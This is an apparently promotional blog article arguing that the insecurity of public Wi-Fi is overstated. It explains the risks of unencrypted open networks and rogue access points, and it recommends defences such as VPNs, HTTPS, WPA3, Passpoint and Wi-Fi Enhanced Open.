One of the greatest benefits of Wi-Fi® is the virtually ubiquitous access provided by means of public
Wi-Fi hotspots. What originally began as a service provided by a handful of niche businesses quickly exploded to become the de facto model for hotels, coffee shops, restaurants, and other businesses. As public Wi-Fi hotspots became mainstream, though, so did the myth that they are inherently insecure and should be avoided.
Public Hotspot Security
Public Wi-Fi hotspots can fall into two categories: Open (or unauthenticated) and secure (or authenticated). Open Wi-Fi networks have no security at all. They do not require a password to join—you can just connect. A secure public hotspot, on the other hand, authenticates users via a password and encrypts wireless traffic.
To be fair, previously connecting to an open Wi-Fi network in a public place did expose users to an increased risk in a couple ways. Unencrypted data and rogue access points are both issues that are somewhat unique to connecting to open public Wi-Fi hotspots. Businesses that provide open Wi-Fi networks have chosen to make the connection experience as seamless and convenient as possible at the expense of better security.
The first challenge is that connections to open Wi-Fi hotspots were generally unencrypted. The value of an open network is that it enables users to connect devices without any authentication. The nature of a networking and the TCP/IP protocol, however, enables any other device connected to that same network to potentially intercept the data. Because the connection between the device and the wireless access point is unencrypted, sensitive information like usernames and passwords, or banking and financial information might be exposed if the user isn’t accessing websites using HTTPS or using a VPN.
The other issue is simply making sure you are connecting to a legitimate public Wi-Fi hotspot, and not a malicious rogue access point. In many public areas today, it is not uncommon to find multiple open networks to choose from. Your laptop or mobile device will detect and display every network within range, so you might see available networks for a hotel, fast food chain, coffee shop, and others all show up.
Most people are not very discerning, though. The primary objective is to get connected to a Wi-Fi network and be able to access an internet connection. If people are in a hurry, they may not notice they are connecting to a rogue access point – these rogue access points are often named something very similar to a legitimate access point—for example using an SSID like “strbucks” or “starbcks” within range of an actual Starbucks where users will be looking for a public Wi-Fi hotspot.
In either case, a third party or a cybercriminal may potentially intercept your unencrypted data.
Debunking the Myth
Simply being aware of the concerns around unencrypted data and rogue access points is a significant step toward protecting against them, and there are simple solutions to mitigate and minimize those risks when connecting to an open Wi-Fi network.
- Businesses or cities deploying public Wi-Fi networks should make sure to deploy Passpoint®, federated programs built on Passpoint® like OpenRoaming, Wi-Fi Enhanced Open, or WPA3 (more on these to come!) for added security precautions
- Use a VPN to encrypt your traffic and prevent it from being intercepted by others connected to the open network
- Connect to HTTPS websites for a secure session
- Disable features that automatically connect with any available open network without user intervention
- Enable a personal firewall to guard against unauthorized access to your device
Public Wi-Fi networks are here to stay, and the myth that public Wi-Fi hotspots are insecure has had very little impact on the availability or use of those networks. Users access public Wi-Fi networks virtually anywhere—hotels, shopping malls, transportation hubs, restaurants and coffee shops, and municipal facilities. And a variety of new security technologies now make public Wi-Fi even more secure. Wi-Fi Alliance recognized both the value and potential risk of public Wi-Fi networks, which is why they have introduced technologies like Wi-Fi Enhanced Open™ and Passpoint®, as well as advanced WPA3™. As these technologies are deployed more widely, the more secure public Wi-Fi will become.
WPA3 improves on WPA2 encryption to make Wi-Fi networks more secure than ever before. WPA3 uses 128-bit encryption and replaces the Pre-Shared Key (PSK) exchange with Simultaneous Authentication of Equals (SAE) for a more secure method of exchange the initial key. The optional SAE Public Key (SAE-PK) feature mitigates rogue—or “evil twin”—access point attacks by providing asymmetric authentication of the access point by encoding a public key fingerprint in the password.
Every public network that want to offer a secure public Wi-Fi experience needs to deploy Passpoint® or WPA3 with Public Key. Passpoint® is a security option available for public or guest networks that includes WPA3™-Enterprise security, with Protected Management Frames (PMF) and additional Wi-Fi Alliance defined security mechanisms. With Passpoint®, users can seamlessly authenticate their device on the network or connect through credentials provisioned by a service provider. Next time they visit the same network, the Passpoint®-enabled client device will automatically connect and provide a secure connection to a Wi-Fi network. Wi-Fi CERTIFIED Passpoint® provides a more secure connection and avoids the potential for accidentally connecting to a rogue access point.
Wi-Fi Enhanced Open
Despite the potential risk of data compromise, there are many situations where an open Wi-Fi network is simply more convenient or may be the only feasible option available.
In situations where the public network absolutely must be unauthenticated, there is Wi-Fi Enhanced Open, and network operators of open Wi-Fi networks should use this feature. Wi-Fi Enhanced Open reduces the risk of data exposure or theft while maintaining the convenience of being able to simply connect to an open network via a public Wi-Fi hotspot. Open Wi-Fi used to mean “unencrypted Wi-Fi”, but now Wi-Fi Enhanced Open networks provide unauthenticated data encryption to users. Based on Opportunistic Wireless Encryption (OWE) defined in the Internet Engineering Task Force (IETF) RFC8110 specification and the Wi-Fi Alliance Opportunistic Wireless Encryption Specification, Wi-Fi Enhanced Open benefits users by providing unauthenticated data encryption while maintaining the ease of use of open networks. The capability is transparent to users, and benefits network providers because there are no public passphrases to maintain, share, or manage.
Use Public Wi-Fi with Confidence
The pervasive myth about the insecurity of public Wi-Fi hotspots is exaggerated, but there is an ounce of truth to it. It is important to be aware of potential security concerns and take appropriate steps—like making sure technologies like Passpoint® are enabled on your device—to ensure your data is not intercepted or compromised while connecting to public Wi-Fi networks. Wi-Fi continues to raise the bar for public Wi-Fi security.
- Julie Smith Shares Identity Security Guidance for 2023 - January 19, 2023
- Mark Thomas Talks about Threat Hunting - January 5, 2023
- Malcom Harkins Talks about Ethical and Legal Obligations of the CISO - October 20, 2022